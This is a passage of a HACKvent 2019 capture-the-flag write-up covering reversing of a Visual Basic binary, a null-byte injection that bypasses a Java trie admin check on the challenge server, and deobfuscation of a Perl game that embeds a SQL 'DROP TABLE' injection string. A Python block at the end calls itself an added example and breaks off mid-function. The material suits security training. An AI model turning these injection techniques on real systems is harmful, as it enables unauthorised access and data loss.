Studio\\VB98\\VB6.OLB\nText1\nLabel1\nVBA6.DLL\n__vbaFreeVar\n__vbaVarForNext\n__vbaStrVarVal\n__vbaVarXor\n__vbaI4Var\n__vbaVarAdd\n__vbaVarSub\n__vbaVarForInit\n__vbaLenVar\n...\n<\/pre>\n<br\/>So let&#8217;s boot up a Windows machine.\n<br\/>\n<br\/>A good start for reversing a Visual Basic binary is <a href=\"https:\/\/www.vb-decompiler.org\/download.htm\" rel=\"noopener noreferrer\" target=\"_blank\">VB Decompiler Lite<\/a>. It quickly displays the form and code components:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/12_01_vbdecomp.png\" width=\"700px\"\/>\n<br\/>\n<br\/>The form only contains a single text field:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/12_02_form.png\" width=\"700px\"\/>\n<br\/>\n<br\/>We can also have a look at the disassembly of the code. A decompiler is available as well, but only in the pro version:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/12_03_code.png\" width=\"700px\"\/>\n<br\/>\n<br\/>By having a quick look at the disassembly we can identify a few interesting static strings:\n<br\/><pre>00401B40h ; \"6klzic<=bPBtdvff'y\\x7fFI~on\/\/N\"\n<br\/>00401B7Ch ; \"Status: correct\"\n<br\/>00401BB0h ; \"Status: wrong\"<\/pre>\n<br\/>The first one is probably the encrypted flag. 
The second and third ones can probably be used to track down the code path for a valid flag.\n<br\/>\n<br\/>Although <code>VB Decompiler<\/code> gives a quick overview, I prefer to use a debugger in order to analyze the binary dynamically.\n<br\/>\n<br\/>So let&#8217;s run the binary in <a href=\"https:\/\/x64dbg.com\/#start\" rel=\"noopener noreferrer\" target=\"_blank\">x64dbg<\/a> (or more precisely x32dbg):\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/12_04_x32dbg.png\" width=\"900px\"\/>\n<br\/>\n<br\/>By pressing <code>F9<\/code> once (<code>Run<\/code>) we continue to the entry point of <code>BackToBasic.exe<\/code>. Here we can set a breakpoint at the beginning of the <code>Text1_Change<\/code> function located at <code>00401F80<\/code> (the address is displayed by VB Decompiler):\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/12_05_br1.png\" width=\"900px\"\/>\n<br\/>\n<br\/>The breakpoint is triggered each time we edit the input of the text field. After the breakpoint is hit we can single step through the code in order to comprehend what the flag is supposed to be. At the beginning there are a few calls to <code>__vbaVarCmpEq<\/code> and static references to the characters <code>H, V, 1<\/code> and <code>9<\/code>. This part probably determines if the flag begins with <code>HV19<\/code>. Following those instructions there is a <code>je 004024B2<\/code> at <code>00402280<\/code>. Following the jump destination (<code>004024B2<\/code>) we can see that this branch outputs the string <code>\"Status: wrong\"<\/code>. 
This means that the jump is not taken if we enter a string with the correct flag prefix.\n<br\/>\n<br\/>We can verify our assumption that the first part checks if the flag begins with <code>HV19<\/code> by setting a breakpoint on the <code>je<\/code> instruction at <code>00402280<\/code> and entering different values in the text field. If we enter something which does not begin with <code>HV19<\/code>, the jump is taken and the program displays the message <code>\"Status: wrong\"<\/code>. As soon as we enter <code>HV19<\/code>, the jump is not taken:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/12_06_jmp1.png\" width=\"900px\"\/>\n<br\/>\n<br\/>Within the next instructions the function <code>__vbaLenVar<\/code> is called, followed by another <code>je<\/code> instruction at <code>004022B9<\/code>. The obvious guess here is that this part determines if the length of the input equals the flag&#8217;s length. A few lines ahead we can also see that <code>0x21<\/code> (= <code>33<\/code>) is stored on the stack. Thus we can assume that the input length should be 33. We can again verify this by setting a breakpoint on the <code>je<\/code> instruction and testing different inputs. As soon as we enter a string of 33 characters which begins with <code>HV19<\/code>, the jump is not taken anymore:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/12_07_jmp2.png\" width=\"900px\"\/>\n<br\/>\n<br\/>In the instructions that follow there is a loop, which seems to iterate over our input. The call to <code>__vbaVarXor<\/code> should raise our attention, since it is probably used to XOR our input and compare it with the static string we also saw in VB Decompiler. Unfortunately it is not too easy to inspect the values on a <code>__vba<\/code> function call, since these functions take Visual Basic variables as parameters. 
Without knowing the structure of these objects, we don&#8217;t know where to find the actual value of a variable.\n<br\/>\n<br\/>After the loop there is a call to <code>__vbaVarTstEq<\/code> followed by another <code>je<\/code> instruction at <code>00402433<\/code>. This is probably the comparison of our XORed input with the static string <code>\"6klzic<=bPBtdvff'y\\x7fFI~on\/\/N\"<\/code> stored at <code>00401B40<\/code>. Let's set a breakpoint on the call and inspect the parameters:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/12_08_ecx.png\" width=\"900px\"\/>\n<br\/>\n<br\/>There are two parameters, which are pushed on the stack before the call (stored <code>eax<\/code> and <code>ecx<\/code>). Again these are actually Visual Basic variables, but if we inspect the value stored in <code>ecx<\/code>, we can see that at offset 8 there is the address of the static string (<code>00401B40<\/code>). If we now inspect the value of <code>eax<\/code> at the same offset, we should see a reference to the string containing our XORed input:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/12_09_eax.png\" width=\"900px\"\/>\n<br\/>\n<br\/>At offset 8 the address <code>0044987C<\/code> is stored. Let's have a look at this address:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/12_10_xor.png\" width=\"600px\"\/>\n<br\/>\n<br\/>This can definitely be our XORed input string. By changing the first character of our input, we can verify that the first character of the supposed XORed input changes.\n<br\/>\n<br\/>At last we only need to change our input so that the XORed input matches the string <code>\"6klzic<=bPBtdvff'y\\x7fFI~on\/\/N\"<\/code>. Changing the first three characters manually reveals the beginning of the flag: <code>0ld<\/code>. 
Let's see if we can find a pattern in the XOR key:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">&gt;&gt;&gt; ord('0')^ord('6')\n6\n&gt;&gt;&gt; ord('l')^ord('k')\n7\n&gt;&gt;&gt; ord('d')^ord('l')\n8\n<\/pre>\n<br\/>Obviously the XOR key is <code>6<\/code> for the first character (which is actually the 6th character of the flag taking the <code>HV19{<\/code> into account) and increases by one for each character. Accordingly the following python script should generate the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">#!\/usr\/bin\/env python\n\nencr = '6klzic&lt;=bPBtdvff\\'y\\x7fFI~on\/\/N'\nflag = ''\nfor i in range(len(encr)):\n  c = encr[i]\n  flag += chr(ord(c)^(i+6))\n\nprint(flag)<\/pre>\n<br\/>Running the script outputs the flag:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/12# .\/flag.py \n0ldsch00l_Revers1ng_Sess10n<\/pre>\n<br\/>The binary verifies that we have found the correct flag:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/12_11_flag.png\" \/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{0ldsch00l_Revers1ng_Sess10n}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.13\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.13 - TrieMe<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_13.png\" \/><\/td><td style=\"color:#333333\">Author: kiwi<\/td><\/tr><tr><td colspan=\"2\">Switzerland's national security is at risk. 
As you try to infiltrate a secret spy facility to save the nation you stumble upon an interesting looking login portal.\n<br\/>\n<br\/>Can you break it and retrieve the critical information?\n<br\/>\n<br\/>Facility: <span class=\"link\">http:\/\/whale.hacking-lab.com:8888\/trieme\/<\/span>\n<br\/><span class=\"link\">HV19.13-NotesBean.java.zip<\/span><\/td><\/tr><\/tbody><\/table>\n<br\/>The provided link leads to a website showing a single text field and a login button:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/13_01_page.png\" \/>\n<br\/>\n<br\/>The provided zip archive contains the java class <code>NotesBean.java<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/13# unzip 34913db9-fd2a-43c8-b563-55a1d10ee4cb.zip \nArchive:  34913db9-fd2a-43c8-b563-55a1d10ee4cb.zip\n  inflating: NotesBean.java          \nroot@kali:~\/hv19\/13# cat NotesBean.java <\/pre><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">package com.jwt.jsf.bean;\nimport org.apache.commons.collections4.trie.PatriciaTrie;\n\nimport java.io.IOException;\nimport java.io.InputStream;\nimport java.io.Serializable;\nimport java.io.StringWriter;\n\nimport javax.faces.bean.ManagedBean;\nimport javax.faces.bean.SessionScoped;\nimport static org.apache.commons.lang3.StringEscapeUtils.unescapeJava;\nimport org.apache.commons.io.IOUtils;\n\n@ManagedBean(name=\"notesBean\")\n@SessionScoped\npublic class NotesBean implements Serializable {\n\n\t\/**\n\t * \n\t *\/\n\tprivate PatriciaTrie&lt;Integer&gt; trie = init();\n\tprivate static final long serialVersionUID = 1L;\n\tprivate static final String securitytoken = \"auth_token_4835989\";\n\n\tpublic NotesBean() {\n\t    super();\n\t    init();\n\t}\n\n\tpublic String getTrie() throws IOException {\n\t\tif(isAdmin(trie)) 
{\n\t\t\tInputStream in=getStreamFromResourcesFolder(\"data\/flag.txt\");\n\t\t\tStringWriter writer = new StringWriter();\n\t\t\tIOUtils.copy(in, writer, \"UTF-8\");\n\t\t\tString flag = writer.toString();\n\n\t\t\treturn flag;\n\t\t}\n\t\treturn \"INTRUSION WILL BE REPORTED!\";\n\t}\n\n\tpublic void setTrie(String note) {\n\t\ttrie.put(unescapeJava(note), 0);\n\t}\n\t\t\n    private static PatriciaTrie&lt;Integer&gt; init(){\n        PatriciaTrie&lt;Integer&gt; trie = new PatriciaTrie&lt;Integer&gt;();\n        trie.put(securitytoken,0);\n\n        return trie;\n    }\n\n    private static boolean isAdmin(PatriciaTrie&lt;Integer&gt; trie){\n        return !trie.containsKey(securitytoken);\n    }\n\n    private static InputStream getStreamFromResourcesFolder(String filePath) {\n    \t  return Thread.currentThread().getContextClassLoader().getResourceAsStream(filePath);\n    \t }\n\n}\n<\/pre>\n<br\/>Let's start by analyzing the code.\n<br\/>\n<br\/>Within the <code>init<\/code> method a <code>PatriciaTrie<\/code> is instantiated and the string (<code>\"auth_token_4835989\"<\/code>) stored in <code>securitytoken<\/code> is added to it, mapped to the value <code>0<\/code>.\n<br\/>\n<br\/>When submitting the text field on the website, the method <code>setTrie<\/code> is probably called, which adds our input to the trie also mapping it to the value <code>0<\/code>.\n<br\/>\n<br\/>The <code>isAdmin<\/code> method determines if we get the flag. The method simply checks if the trie contains the key <code>\"auth_token_4835989\"<\/code> (<code>securitytoken<\/code>). If this is <b>not<\/b> the case, we are admin.\n<br\/>\n<br\/>This means that we somehow have to remove the key <code>\"auth_token_4835989\"<\/code> from the trie to get the flag.\n<br\/>\n<br\/>In order to execute the code locally and test different inputs without touching the webserver, we need to download the required dependencies. 
In this case we need the following four <code>.jar<\/code> files:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/13# ls -al *.jar\n-rw-r--r-- 1 root root  646680 Oct 16  2013 common-lang3.jar\n-rw-rw-rw- 1 root root  751238 Dec  1 18:30 commons-collections4-4.1.jar\n-rw-r--r-- 1 root root  185140 Dec 13 09:20 commons-io-2.4.jar\n-rw-r--r-- 1 root root 2555166 Oct 16  2013 javax.faces.jar\n<\/pre>\n<br\/>Now we can compile the class <code>NotesBean<\/code> (<code>-cp<\/code> sets the classpath):\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/13# javac -cp '.\/commons-collections4-4.1.jar:.\/javax.faces.jar:.\/commons-io-2.4.jar:.\/common-lang3.jar:.\/' NotesBean.java<\/pre>\n<br\/>In order to instantiate an object of the class <code>NotesBean<\/code>, we add a static <code>main<\/code> method:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\n    public static void main(String args[]) {\n        NotesBean b = new NotesBean();\n    }\n...<\/pre>\n<br\/>To mimic the behavior of the server, we add our input (<code>setTrie<\/code>) and then call the <code>isAdmin<\/code> method:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\n        NotesBean b = new NotesBean();\n        b.setTrie(\"test\");\n        System.out.println(b.getRawTrie());\n\n        if (NotesBean.isAdmin(b.getRawTrie())) System.out.println(\"admin\");\n        else System.out.println(\"nope\");\n...<\/pre>\n<br\/>The added method <code>getRawTrie<\/code> simply returns the <code>PatriciaTrie<\/code> object:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\n\tpublic 
PatriciaTrie&lt;Integer&gt; getRawTrie() {\n\t\treturn trie;\n\t}\n...<\/pre>\n<br\/>Recompiling and running the class shows the two entries within the trie and that we are obviously no admin, since the <code>\"auth_token_4835989\"<\/code> key is still present:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">\nroot@kali:~\/hv19\/13# javac -cp '.\/commons-collections4-4.1.jar:.\/javax.faces.jar:.\/commons-io-2.4.jar:.\/common-lang3.jar:.\/' NotesBean.java\nroot@kali:~\/hv19\/13# java -cp '.\/commons-collections4-4.1.jar:.\/javax.faces.jar:.\/commons-io-2.4.jar:.\/common-lang3.jar:.' NotesBean\nTrie[2]={\n  Entry(key=auth_token_4835989 [9], value=0, parent=ROOT, left=ROOT, right=test [11], predecessor=test [11])\n  Entry(key=test [11], value=0, parent=auth_token_4835989 [9], left=auth_token_4835989 [9], right=test [11], predecessor=test [11])\n}\n\nnope<\/pre>\n<br\/>My assumption was that if we are somehow able to remove the key just by adding another key, this key is probably almost the same. 
So let's fuzz the application by appending one extra byte to the existing key and adding the result to the trie (the loop counter is an <code>int<\/code>, since a Java <code>byte<\/code> only ranges from -128 to 127 and would never reach 256):\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\n\t\/\/ iterate over all 256 byte values; an int counter avoids the byte wrap-around\n\tfor (int i = 0; i &lt; 256; i++) {\n\t\tNotesBean b = new NotesBean();\n\t\tbyte[] array = {(byte) i};\n\t\tString s = new String(array);\n\t\tb.setTrie(\"auth_token_4835989\"+s);\n\t\tSystem.out.println(b.getRawTrie());\n\n\t\tif (NotesBean.isAdmin(b.getRawTrie())) {\n\t\t\tSystem.out.println(i);\n\t\t\tSystem.out.println(\"admin\");\n\t\t\treturn;\n\t\t}\n\t\telse System.out.println(\"nope\");\n\t}\n...<\/pre>\n<br\/>Recompiling and running the code:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">root@kali:~\/hv19\/13# ...\nTrie[1]={\n  Entry(key=auth_token_4835989 [9], value=0, parent=ROOT, left=ROOT, right=auth_token_4835989 [9], predecessor=auth_token_4835989 [9])\n}\n\n0\nadmin\n<\/pre>\n<br\/>Wait, what?\n<br\/>\n<br\/>We actually got a hit right at byte <code>0x00<\/code>. As we can see the trie now only contains one key instead of two. And this key seems to be the string <code>\"auth_token_4835989\\x00\"<\/code>. The key <code>\"auth_token_4835989\"<\/code> was probably overwritten by our entry, since a part of the code did honor the null byte and another part did not honor it.\n<br\/>\n<br\/>Now we only need to carry out our attack against the real webserver. 
In order to do this we can fire up burp, enter the string <code>\"auth_token_4835989\"<\/code> and add a null byte (<code>%00<\/code>) in the intercepted request:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/13_02_auth.png\" \/>\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/13_03_burp.png\" \/>\n<br\/>\n<br\/>And we actually get the flag:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/13_04_flag.png\" \/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">HV19{get_th3_chocolateZ}<\/span>.\n<br\/><br\/>\n<hr id=\"chlgHV19.14\"\/><span style=\"float:right;\"><a href=\"\">return to overview &#x21E7;<\/a><\/span><h1>HV19.14 - Achtung&nbsp;das&nbsp;Flag<\/h1>\n<table class=\"chlgTable\"><tbody><tr><td width=\"130\"><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/ball_14.png\" \/><\/td><td style=\"color:#333333\">Author: M. (who else)<\/td><\/tr><tr><td colspan=\"2\">Let's play another little game this year. 
Once again, I promise it is hardly obfuscated.\n<br\/>\n<br\/><pre>use Tk;use MIME::Base64;chomp(($a,$a,$b,$c,$f,$u,$z,$y,$r,$r,$u)=<DATA>);sub M{$M=shift;##\n<br\/>@m=keys %::;(grep{(unpack(\"%32W*\",$_).length($_))eq$M}@m)[0]};$zvYPxUpXMSsw=0x1337C0DE;###\n<br\/>\/_help_me_\/;$PMMtQJOcHm8eFQfdsdNAS20=sub{$zvYPxUpXMSsw=($zvYPxUpXMSsw*16807)&0xFFFFFFFF;};\n<br\/>($a1Ivn0ECw49I5I0oE0='07&3-\"11*\/(')=~y$!-=$`-~$;($Sk61A7pO='K&:P3&44')=~y$!-=$`-~$;m\/Mm\/g;\n<br\/>($sk6i47pO='K&:R&-&\"4&')=~y$!-=$`-~$;;;;$d28Vt03MEbdY0=sub{pack('n',$fff[$S9cXJIGB0BWce++]\n<br\/>^($PMMtQJOcHm8eFQfdsdNAS20->()&0xDEAD));};'42';($vgOjwRk4wIo7_=MainWindow->new)->title($r)\n<br\/>;($vMnyQdAkfgIIik=$vgOjwRk4wIo7_->Canvas(\"-$a\"=>640,\"-$b\"=>480,\"-$u\"=>$f))->pack;@p=(42,42\n<br\/>);$cqI=$vMnyQdAkfgIIik->createLine(@p,@p,\"-$y\"=>$c,\"-$a\"=>3);;;$S9cXJIGB0BWce=0;$_2kY10=0;\n<br\/>$_8NZQooI5K4b=0;$Sk6lA7p0=0;$MMM__;$_=M(120812).'\/'.M(191323).M(133418).M(98813).M(121913)\n<br\/>.M(134214).M(101213).'\/'.M(97312).M(6328).M(2853).'+'.M(4386);s|_||gi;@fff=map{unpack('n',\n<br\/>$::{M(122413)}->($_))}m:...:g;($T=sub{$vMnyQdAkfgIIik->delete($t);$t=$vMnyQdAkfgIIik->#FOO\n<br\/>createText($PMMtQJOcHm8eFQfdsdNAS20->()%600+20,$PMMtQJOcHm8eFQfdsdNAS20->()%440+20,#Perl!!\n<br\/>\"-text\"=>$d28Vt03MEbdY0->(),\"-$y\"=>$z);})->();$HACK;$i=$vMnyQdAkfgIIik->repeat(25,sub{$_=(\n<br\/>$_8NZQooI5K4b+=0.1*$Sk6lA7p0);;$p[0]+=3.0*cos;$p[1]-=3*sin;;($p[0]>1&&$p[1]>1&&$p[0]<639&#038;&#038;\n<br\/>$p[1]<479)||$i->cancel();00;$q=($vMnyQdAkfgIIik->find($a1Ivn0ECw49I5I0oE0,$p[0]-1,$p[1]-1,\n<br\/>$p[0]+1,$p[1]+1)||[])->[0];$q==$t&&$T->();$vMnyQdAkfgIIik->insert($cqI,'end',\\@p);($q==###\n<br\/>$cqI||$S9cXJIGB0BWce>44)&&$i->cancel();});$KE=5;$vgOjwRk4wIo7_->bind(\"<$Sk61A7pO-n>\"=>sub{\n<br\/>$Sk6lA7p0=1;});$vgOjwRk4wIo7_->bind(\"<$Sk61A7pO-m>\"=>sub{$Sk6lA7p0=-1;});$vgOjwRk4wIo7_#%\"\n<br\/>->bind(\"<$sk6i47pO-n>\"=>sub{$Sk6lA7p0=0 if$Sk6lA7p0>0;});$vgOjwRk4wIo7_->bind(\"<$sk6i47pO\"\n<br\/>.\"-m>\"=>sub{$Sk6lA7p0=0 
if $Sk6lA7p0<0;});$::{M(7998)}->();$M_decrypt=sub{'HACKVENT2019'};\n<br\/>__DATA__\n<br\/>The cake is a lie!\n<br\/>width\n<br\/>height\n<br\/>orange\n<br\/>black\n<br\/>green\n<br\/>cyan\n<br\/>fill\n<br\/>Only perl can parse Perl!\n<br\/>Achtung das Flag! --> Use N and M\n<br\/>background\n<br\/>M'); DROP TABLE flags; -- \n<br\/>Run me in Perl!\n<br\/>__DATA__<\/pre><\/td><\/tr><\/tbody><\/table>\n<br\/>The obfuscated Perl script is a little snake-style game, where we can collect each part of the flag two characters at a time. If we hit ourselves or an outer border, the game stops:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/12\/14_01_snake.png\" \/>\n<br\/>\n<br\/>At first let's use an <a href=\"https:\/\/www.tutorialspoint.com\/online_perl_formatter.htm\" rel=\"noopener noreferrer\" target=\"_blank\">online formatter<\/a> to beautify the code:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">use Tk;\nuse MIME::Base64;\nchomp( ( $a, $a, $b, $c, $f, $u, $z, $y, $r, $r, $u ) = &lt;DATA&gt; );\n\nsub M {\n    $M = shift;\n    @m = keys %::;\n    ( grep { ( unpack( \"%32W*\", $_ ) . 
length($_) ) eq $M } @m )[0];\n}\n$zvYPxUpXMSsw = 0x1337C0DE;\n\/_help_me_\/;\n$PMMtQJOcHm8eFQfdsdNAS20 =\n  sub { $zvYPxUpXMSsw = ( $zvYPxUpXMSsw * 16807 ) & 0xFFFFFFFF; };\n( $a1Ivn0ECw49I5I0oE0 = '07&3-\"11*\/(' ) =~ y$!-=$`-~$;\n( $Sk61A7pO           = 'K&:P3&44' ) =~ y$!-=$`-~$;\nm\/Mm\/g;\n( $sk6i47pO = 'K&:R&-&\"4&' ) =~ y$!-=$`-~$;\n$d28Vt03MEbdY0 = sub {\n    pack( 'n',\n        $fff[ $S9cXJIGB0BWce++ ] ^ ( $PMMtQJOcHm8eFQfdsdNAS20-&gt;() & 0xDEAD ) );\n};\n'42';\n( $vgOjwRk4wIo7_ = MainWindow-&gt;new )-&gt;title($r);\n( $vMnyQdAkfgIIik =\n      $vgOjwRk4wIo7_-&gt;Canvas( \"-$a\" =&gt; 640, \"-$b\" =&gt; 480, \"-$u\" =&gt; $f ) )-&gt;pack;\n@p = ( 42, 42 );\n$cqI           = $vMnyQdAkfgIIik-&gt;createLine( @p, @p, \"-$y\" =&gt; $c, \"-$a\" =&gt; 3 );\n$S9cXJIGB0BWce = 0;\n$_2kY10        = 0;\n$_8NZQooI5K4b  = 0;\n$Sk6lA7p0      = 0;\n$MMM__;\n$_ =\n    M(120812) . '\/'\n  . M(191323)\n  . M(133418)\n  . M(98813)\n  . M(121913)\n  . M(134214)\n  . M(101213) . '\/'\n  . M(97312)\n  . M(6328)\n  . M(2853) . '+'\n  . 
M(4386);\ns|_||gi;\n@fff = map { unpack( 'n', $::{ M(122413) }-&gt;($_) ) } m:...:g;\n(\n    $T = sub {\n        $vMnyQdAkfgIIik-&gt;delete($t);\n        $t = $vMnyQdAkfgIIik-&gt;createText(\n            $PMMtQJOcHm8eFQfdsdNAS20-&gt;() % 600 + 20,\n            $PMMtQJOcHm8eFQfdsdNAS20-&gt;() % 440 + 20,\n            \"-text\" =&gt; $d28Vt03MEbdY0-&gt;(),\n            \"-$y\"   =&gt; $z\n        );\n    }\n)-&gt;();\n$HACK;\n$i = $vMnyQdAkfgIIik-&gt;repeat(\n    25,\n    sub {\n        $_ = ( $_8NZQooI5K4b += 0.1 * $Sk6lA7p0 );\n        $p[0] += 3.0 * cos;\n        $p[1] -= 3 * sin;\n        ( $p[0] &gt; 1 && $p[1] &gt; 1 && $p[0] &lt; 639 && $p[1] &lt; 479 )\n          || $i-&gt;cancel();\n        00;\n        $q = (\n            $vMnyQdAkfgIIik-&gt;find(\n                $a1Ivn0ECw49I5I0oE0,\n                $p[0] - 1,\n                $p[1] - 1,\n                $p[0] + 1,\n                $p[1] + 1\n              )\n              || []\n        )-&gt;[0];\n        $q == $t && $T-&gt;();\n        $vMnyQdAkfgIIik-&gt;insert( $cqI, 'end', \\@p );\n        ( $q == $cqI || $S9cXJIGB0BWce &gt; 44 ) && $i-&gt;cancel();\n    }\n);\n$KE = 5;\n$vgOjwRk4wIo7_-&gt;bind(\n    \"&lt;$Sk61A7pO-n&gt;\" =&gt; sub {\n        $Sk6lA7p0 = 1;\n    }\n);\n$vgOjwRk4wIo7_-&gt;bind( \"&lt;$Sk61A7pO-m&gt;\" =&gt; sub { $Sk6lA7p0 = -1; } );\n$vgOjwRk4wIo7_-&gt;bind( \"&lt;$sk6i47pO-n&gt;\" =&gt; sub { $Sk6lA7p0 = 0 if $Sk6lA7p0 &gt; 0; }\n);\n$vgOjwRk4wIo7_-&gt;bind(\n    \"&lt;$sk6i47pO\" . \"-m&gt;\" =&gt; sub { $Sk6lA7p0 = 0 if $Sk6lA7p0 &lt; 0; } );\n$::{ M(7998) }-&gt;();\n$M_decrypt = sub { 'HACKVENT2019' };\n__DATA__\nThe cake is a lie!\nwidth\nheight\norange\nblack\ngreen\ncyan\nfill\nOnly perl can parse Perl!\nAchtung das Flag! 
--&gt; Use N and M\nbackground\nM'); DROP TABLE flags; -- \nRun me in Perl!\n__DATA__\n<\/pre>\n<br\/>After changing the code a little bit to get familiar with it, we can follow different approaches.\n<br\/>\n<br\/>One approach would be to simply remove the calls to <code>cancel()<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\n        ( $p[0] &gt; 1 && $p[1] &gt; 1 && $p[0] &lt; 639 && $p[1] &lt; 479 )\n          || $i-&gt;cancel();\n        00;\n...\n        ( $q == $cqI || $S9cXJIGB0BWce &gt; 44 ) && $i-&gt;cancel();\n...<\/pre>\n<br\/>This way the game does not stop even if we hit ourselves or a border. However, it is quite tiring to collect all parts of the flag manually, since the flag seems to be very long.\n<br\/>\n<br\/>After understanding the code even better, we can slow the game down by increasing the tick interval, editing the following <code>25<\/code> to e.g. <code>2500<\/code>:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\n$i = $vMnyQdAkfgIIik-&gt;repeat(\n    25,\n    sub {\n...\n<\/pre>\n<br\/>Also we want to edit the following line:\n<br\/><pre style=\"background-color:#000000;color:#00ff00;padding:6px;font-size:14px;line-height:18px;white-space:pre-wrap;\">...\n        $q == $t && $T-&gt;();\n...\n<\/pre>\n<br\/><code>$T->()<\/code> is called in order to move to the next part of the flag. If we skip the condition before it and just call <code>$T->()<\/code>, the program kindly prints each part of the flag out one after another. 
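Both facts the patched script relies on (that M() resolves the script's own variable names from their checksum and length, and that every flag part consumes three draws from the same generator, two for the text position and one for the XOR mask) can be checked offline. The Python below is an added example, not code from the write-up or from the challenge: it ports sub M, rebuilds the base64 ciphertext from the names listed in the script, replays the generator and recovers the flag without Tk. The symbol list is copied from the script; the two exports it resolves the same way (Tk's MainLoop and MIME::Base64's decode_base64) are added by hand.

```python
import base64
import struct

# Names from the script's own symbol table (keys %::), plus the two exports
# it resolves the same way: MainLoop (Tk) and decode_base64 (MIME::Base64).
SYMBOLS = [
    "zvYPxUpXMSsw", "PMMtQJOcHm8eFQfdsdNAS20", "a1Ivn0ECw49I5I0oE0",
    "Sk61A7pO", "sk6i47pO", "Sk6lA7p0", "d28Vt03MEbdY0", "vgOjwRk4wIo7_",
    "vMnyQdAkfgIIik", "cqI", "S9cXJIGB0BWce", "_2kY10", "_8NZQooI5K4b",
    "MMM__", "fff", "HACK", "KE", "M_decrypt", "MainLoop", "MainWindow",
    "decode_base64", "encode_base64",
]

# The argument list of the M() calls that build $_ in the script, with the
# literal '/' and '+' pieces in between.
M_ARGS = (120812, "/", 191323, 133418, 98813, 121913, 134214, 101213,
          "/", 97312, 6328, 2853, "+", 4386)

SEED = 0x1337C0DE           # initial value of $zvYPxUpXMSsw
MULTIPLIER = 16807          # the generator's multiplier


def perl_key(name):
    """unpack('%32W*', $name) . length($name): code-point sum mod 2**32, then the length."""
    return f"{sum(ord(c) for c in name) & 0xFFFFFFFF}{len(name)}"


def resolve_m(number, symbols=SYMBOLS):
    """Port of sub M: the first symbol whose key equals the requested number."""
    return next((s for s in symbols if perl_key(s) == str(number)), None)


def ciphertext_words():
    """Rebuild @fff: join the resolved names, drop every '_' (s|_||gi), cut the
    result into 3-character base64 groups (m:...:g) and decode each group to one
    big-endian 16-bit word (unpack 'n')."""
    text = "".join(p if isinstance(p, str) else resolve_m(p) for p in M_ARGS)
    text = text.replace("_", "")
    groups = [text[i:i + 3] for i in range(0, len(text) - len(text) % 3, 3)]
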